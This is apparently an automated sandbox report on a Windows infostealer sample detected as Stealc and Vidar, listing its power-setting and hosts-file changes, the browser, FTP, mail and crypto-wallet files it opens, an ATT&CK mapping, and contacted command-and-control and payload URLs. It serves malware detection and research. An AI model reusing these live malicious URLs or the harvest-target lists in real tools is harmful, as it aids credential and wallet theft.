Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_00418CF0 GetSystemTime,

0_2_00418CF0

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_004179E0

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_00417BC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_00417BC0

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior

Modifies the hosts file

Source: C:\ProgramData\HIIDGCGCBF.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.3.b4s45TboUL.exe.2570000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b4s45TboUL.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b4s45TboUL.exe.2490e67.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.b4s45TboUL.exe.2570000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b4s45TboUL.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: b4s45TboUL.exe PID: 6556, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: b4s45TboUL.exe PID: 6556, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: b4s45TboUL.exe	String found in binary or memory: eam Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\
Source: b4s45TboUL.exe	String found in binary or memory: xodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDog
Source: b4s45TboUL.exe	String found in binary or memory: eam Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\
Source: b4s45TboUL.exe	String found in binary or memory: window-state.json
Source: b4s45TboUL.exe	String found in binary or memory: \jaxx\Local Storage\
Source: b4s45TboUL.exe	String found in binary or memory: eam Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\
Source: b4s45TboUL.exe	String found in binary or memory: eam Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\
Source: b4s45TboUL.exe	String found in binary or memory: xodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDog
Source: b4s45TboUL.exe	String found in binary or memory: eam Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\
Source: b4s45TboUL.exe	String found in binary or memory: passphrase.json
Source: b4s45TboUL.exe	String found in binary or memory: \jaxx\Local Storage\
Source: b4s45TboUL.exe	String found in binary or memory: \Ethereum\
Source: b4s45TboUL.exe	String found in binary or memory: eam Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\
Source: b4s45TboUL.exe	String found in binary or memory: \Ethereum\
Source: b4s45TboUL.exe	String found in binary or memory: file__0.localstorage
Source: b4s45TboUL.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: b4s45TboUL.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: b4s45TboUL.exe	String found in binary or memory: \MultiDoge\
Source: b4s45TboUL.exe	String found in binary or memory: xodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDog
Source: b4s45TboUL.exe	String found in binary or memory: eam Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\
Source: b4s45TboUL.exe	String found in binary or memory: eam Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\b4s45TboUL.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: b4s45TboUL.exe PID: 6556, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.3.b4s45TboUL.exe.2570000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b4s45TboUL.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b4s45TboUL.exe.2490e67.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.b4s45TboUL.exe.2570000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b4s45TboUL.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: b4s45TboUL.exe PID: 6556, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: b4s45TboUL.exe PID: 6556, type: MEMORYSTR

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E1307A sqlite3_transfer_bindings,	0_2_61E1307A
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E2D5E6 sqlite3_bind_int64,	0_2_61E2D5E6
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E2D595 sqlite3_bind_double,	0_2_61E2D595
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E0B431 sqlite3_clear_bindings,	0_2_61E0B431
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E037F3 sqlite3_value_frombind,	0_2_61E037F3
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E2D781 sqlite3_bind_zeroblob64,	0_2_61E2D781
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E2D714 sqlite3_bind_zeroblob,	0_2_61E2D714
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E2D68C sqlite3_bind_pointer,	0_2_61E2D68C
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E2D65B sqlite3_bind_null,	0_2_61E2D65B
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E2D635 sqlite3_bind_int,	0_2_61E2D635
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E2D9B0 sqlite3_bind_value,	0_2_61E2D9B0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E2D981 sqlite3_bind_text16,	0_2_61E2D981
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E2D945 sqlite3_bind_text64,	0_2_61E2D945

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 File and Directory Permissions Modification	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Create Account	1 DLL Side-Loading	111 Disable or Modify Tools	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	1 Windows Service	1 Windows Service	1 Deobfuscate/Decode Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	111 Process Injection	1 Abuse Elevation Control Mechanism	NTDS	145 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	23 Software Packing	Cached Domain Credentials	651 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	441 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Masquerading	Proc Filesystem	12 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	441 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	111 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
b4s45TboUL.exe	39%	ReversingLabs
b4s45TboUL.exe	100%	Avira	HEUR/AGEN.1306967
b4s45TboUL.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\Google\Chrome\updater.exe	47%	ReversingLabs	Win64.Trojan.Cerbu
C:\ProgramData\HIIDGCGCBF.exe	47%	ReversingLabs	Win64.Trojan.Cerbu
C:\ProgramData\chrome.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\chrome_131[1].exe	47%	ReversingLabs	Win64.Trojan.Cerbu

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://docs.rs/getrandom#nodejs-es-module-support	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gosp.clinicavertigen.com	87.106.236.48	true	false		unknown
198.187.3.20.in-addr.arpa	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Reputation
https://gosp.clinicavertigen.com/tmpp/chrome_131.exe	false	unknown
http://45.91.200.39/cb9cc10e175e1537/sqlite3.dll	true	unknown
http://45.91.200.39/eaa194fa594ff9c2.php	true	unknown
http://45.91.200.39/	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://45.91.200.39/eaa194fa594ff9c2.phpp	b4s45TboUL.exe, 00000000.00000002.2105869002.0000000021011000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gosp.clinicavertigen.com/-	b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://45.91.200.39/eaa194fa594ff9c2.php4	b4s45TboUL.exe, 00000000.00000002.2105869002.0000000021011000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://docs.rs/getrandom#nodejs-es-module-support	b4s45TboUL.exe, b4s45TboUL.exe, 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmp, b4s45TboUL.exe, 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://45.91.200.39/eaa194fa594ff9c2.php1f9a9c4a2f8b514.cdf-ms	b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009C2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://45.91.200.396	b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	b4s45TboUL.exe, 00000000.00000003.1761148911.0000000020EF1000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	b4s45TboUL.exe, 00000000.00000003.1761148911.0000000020EF1000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://www.ecosia.org/newtab/	b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://45.91.200.39/eaa194fa594ff9c2.php~1.d	b4s45TboUL.exe, 00000000.00000003.1764389556.00000000009FA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://45.91.200.39/4e	b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://gosp.clinicavertigen.com/tmpp/chrome_131.exeac	b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://45.91.200.39	b4s45TboUL.exe, 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	true		unknown
